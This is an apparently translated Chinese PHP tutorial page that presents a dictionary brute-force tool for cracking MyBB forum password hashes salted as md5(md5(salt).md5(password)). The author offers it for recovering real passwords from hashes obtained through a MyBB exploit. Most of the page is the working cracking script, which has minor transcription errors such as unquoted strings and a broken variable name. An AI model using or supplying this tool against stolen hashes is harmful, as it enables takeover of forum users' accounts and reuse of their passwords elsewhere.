Home  >  Article  >  Backend Development  >  MyBB forum program password brute force cracking tool PHP version_PHP tutorial

MyBB forum program password brute force cracking tool PHP version_PHP tutorial

WBOY
WBOYOriginal
2016-07-13 17:34:062678browse

After disappearing and watching the myBB forum exploit two days ago, the password that was cracked was very abnormal~ It was in the form of md5(md5(salt).md(pass))~
There has been no progress~ I wrote a small application today ~ I hope everyone can use it ~
pass.txt is a password dictionary ~ ~ one per line ~

In addition, although the program uses very rubbish English characters, the program is absolutely original~

[Copy to clipboard] [ - ]CODE:
/*
MyBB forum program password brute force cracking tool PHP version By Cool_wXd[C.R.S.T]
This program is mainly for MyBB forum program password encryption format is md5(md5(salt).md5(password))
Because the exploit program for MyBB on the Internet only cracks the password in the database, but does not crack the real password
It is also due to the recent I encountered such a problem, so I wrote such a simple small program, hoping it can help!
*/
if ($argc<3)
{
print "-------------------------- ---------------------------------- ";
print " MyBB Password Cracker v1.0 ";
print "---------------------------------------------- ------------------- ";
print "Usage: mybb_password_cracker.php [md5_hash] [salt] ";
print "---------------------------------------------- ------------------- ";
print "http://www.wolfexp.net & http://hi.baidu.com/cool_wxd ";
print " By Cool_wXd[C.R.S.T] ";
print "---------------------------------------------- ------------------- ";
die;
}
function salt_password($password, $salt)
{
return md5(md5($salt).md5($password));
}
$md5_hash = $argv[1];
$salt = $argv[2];
$dict="pass.txt";//password dictionary
if (strlen($md5_hash) !=32) {echo Error... The md5_hash must be 32 bits; die;}
if(!file_exists($dict)) {echo Can not find the password dictionary;die;}
$dict_pass= file($dict);
$num=sizeof($dict_pass);
for($i=0;$i<$num;$i++)
{
$now_password=chop($ dict_pass[$i]);
if($md5_hash==salt_password($now_password,$salt)) {echo Success!(.$md5_hash.)is cracked and the true password is: (.$now_password.); break;}}
?>
In addition, the password cracking of our registered account in the forum we tested is as shown in the figure



www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/508529.htmlTechArticleAfter the myBB forum exploit that I watched two days ago and disappeared, the password that was cracked was very abnormal ~ it was md5 (md5(salt).md(pass)) This form~ There has been no progress~ Today I wrote a small...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn